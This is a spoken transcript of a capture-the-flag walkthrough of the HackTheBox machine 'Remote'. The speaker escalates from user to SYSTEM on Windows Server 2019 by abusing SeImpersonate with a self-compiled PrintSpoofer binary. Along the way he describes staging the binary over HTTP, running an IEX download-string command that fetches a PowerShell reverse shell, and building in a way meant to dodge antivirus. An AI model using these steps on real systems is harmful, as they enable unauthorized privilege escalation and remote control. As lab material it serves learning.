Hey YouTube, what's going on? I'm Rocket, and this is part 2 of my Remote HackTheBox walkthrough, where we'll be escalating our privileges from user to system. If you want to get some more context for how we got the user on previously, you can check out part 1 in the video description below. So, the privilege escalation process here was kind of riddled with rabbit holes, but that's a good thing because it really teaches you what to prioritize during your enumeration process, and I feel like that is a good thing to show in this video. So without further ado, let's get right to it. So the first thing I like to do when elevating my privileges from user to system is running the whoami/all command, and this displays the groups that I am part of and the privileges that my current user has. So in this case, the interesting group here is the NT Authority Service group. This group, in combination with the SC impersonate privilege, is a recipe for executing the Juicy Potato family of privilege escalation exploits. Juicy Potato works up until Windows Server 2016, but does not appear to work on Windows Server 2019. So let's see which host we're on. So we'll run system info to figure that out. And it looks like we are running on a Windows Server 2019. That said, we can still ask ourselves, hey, well, if Juicy Potato won't work on Windows Server 2019, then can we still abuse the SC impersonate privilege on Windows Server 2019 to elevate our privileges? Well, let's check that out right now. So doing a quick Google search for abusing SC impersonate privilege on Windows Server 2019, we will eventually stumble upon this link right here, which I will share in the video description below. So this print spoofer exploit, it uses similar concepts used in the Rotten Potato family of exploits, so like Rotten Potato, Juicy Potato. So scrolling down, eventually we will find a GitHub repository where we can download the exploit code and run it. And for those of you who are curious, I believe the way how this exploit works is it takes the spooler service and tries to create a named pipe on behalf of the spooler service's privileges, which is where you use the SC impersonate privilege. And because of that, then you are now executing code via that named pipe, and your privileges are now system. So the author does say that he did test it on Windows Server 2019, and all you need is the SC impersonate privilege. So it looks like we didn't really need to be part of the NT Authority Service group for this, which according to the author. So that's interesting. Good to know. So going to this repo right here, we do not have any releases, so we will have to clone this code and build it ourselves on a Windows machine. Scrolling back down, it does look like we can use it to spawn a system reverse shell. So I am going to move to a Windows machine and clone and compile the source code there. So I'll run git clone printspoofer.git, go to printspoofer, open up Explorer, and then open up the solution file in Visual Studio. The thing about Visual Studio is before we build this executable, we need a target. So I always like to build release versions, because when you compile a debug executable, it's more likely to get flagged by antivirus software. Also, the executable happens to be a lot bigger, so it will make file transfers a lot slower. If you're not sure which architecture to choose, we can always go back to the host right here and check out the processor architecture PowerShell environment variable. In this case, we are running on a 64-bit host, so we will compile a release version of this binary for Windows x64. You can do that by doing Control-Shift-B. It should build your executable. It's also good to kind of just like glance at the source a little bit, but because this is a kernel exploit, sorry, it's not a kernel exploit per se, but this exploit does use concepts in the Rotten Potato family, so there is a bit of theory involved. Cool. All right, so we built it. Let's go download this on our Kali machine. So I'll say python http.server Oh, I need to specify, so python dash m http.server. And I need to know my IP address so I can download it to my Kali machine. I'll say ipconfig. This is the IP address. We'll copy this. We'll go to the Kali machine.
Then,
so from here, you can just say wget http this host port 8000, and we can go get the printspoofer.exe. So it looks like we have it, and you can run the file command on it to make sure that it is indeed a Windows portable executable. Perfect. All right, so at this point, we are going to host a HTTP server right here with python 3-m http.server. We'll listen on port 8001, and we're going to go download this. So we'll go to the music directory right here, and we'll say with PowerShell we will just go download this with this command right here. So we can just say new object system.net.web client.download file, and our Kali HTTP address is, IP address is 10.10.14.48. We want to download this executable from port 8001 on our web server. And it is called, I think it was printspoofer.exe. And we're going to download that as rocket.exe. So this way there's like less chance of spoiling the challenge for other users who are currently on this box. Let's call it rocket.exe. So it looks like we have the executable now. So we can execute it, rocket.exe, and then -h for help. And we can run PowerShell, get a reverse shell. So instead of downloading Netcat, I'm just going to use the same PowerShell reverse shell that I used in the previous video, which I am hosting right here. So just to make sure I remember which port I have it configured to listen on, it is port 2001. If you're curious for how this works and how I configured this exploit, you can check out the previous video. So we are going to need to spin up a Netcat listener on port 2001. So I'll say rlwrap ncat and vlp 2001 down here. And we're going to invoke the print spoofer. So we'll say rocket.exe, go -i-c, and then we'll say PowerShell. IX means invoke expression. So again, similar concept to how we downloaded this executable originally. We'll just say new object system.net.web client download string HTTP, and it was 10.10.14.48 port 8000 rocket-rsh.ps1. I believe that's what it was. That's what it looks like. Cool. Do we have everything set up? I'm double checking this because if I mess up this exploit, I basically lose my reverse shell right here, and I'll have to do it all over again. Run it. And it looks like it worked. So let's see who we are right here. So we can say, who am I? And it looks like we are system. So let's see if we can get the root user flag. Let's see, users, go to administrator, go to desktop, do an ls, and it looks like there is the flag. So that's going to be a wrap up for this video. I hope you enjoyed it, and I will see you in the next series.